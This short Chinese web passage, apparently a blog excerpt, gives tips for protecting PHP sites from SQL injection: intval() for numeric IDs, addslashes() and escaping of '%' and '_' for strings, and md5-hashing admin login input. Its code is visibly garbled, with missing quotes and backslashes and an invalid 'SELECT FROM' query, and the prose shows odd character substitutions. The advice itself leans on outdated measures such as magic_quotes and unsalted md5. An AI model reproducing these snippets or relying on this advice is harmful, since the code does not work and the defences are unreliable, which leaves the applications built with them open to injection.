对于id型咱们能够利用intval()函数，intval()函数能够将变量转换成整数类型，这样就能够了。
咱们能够这样
$id = intval($id);
$query=SELECT FROM alphadb WHERE articleid='$id');
若是是字符型的呢？
咱们能够先用addslashes()过滤一下，而后再过滤”%”和”_”.
例如：
$search = addslashes($search);
$search = str_replace(_,_,$search);
$search = str_replace(%,%,$search);
记得，可千万别在magic_quotes_gpc＝On的状况下替换为,以下：
$password=str_replace(,,$password);
我记得在darkness的文章《对某PHP站点的一次渗透》中提到过这个问题（在光盘中有收录）。
还有的就是登录的地方，若是是只用一个管理员管理的话，咱们能够直接对username和passwd用md5加密，这样就不用惧怕注入技术的发展了。
Username=md5($HTTP_POST_VARS[username]);
Passwd=md5($HTTP_POST_VARS[passwd]);
个人后台登录就是这样子的哦。 web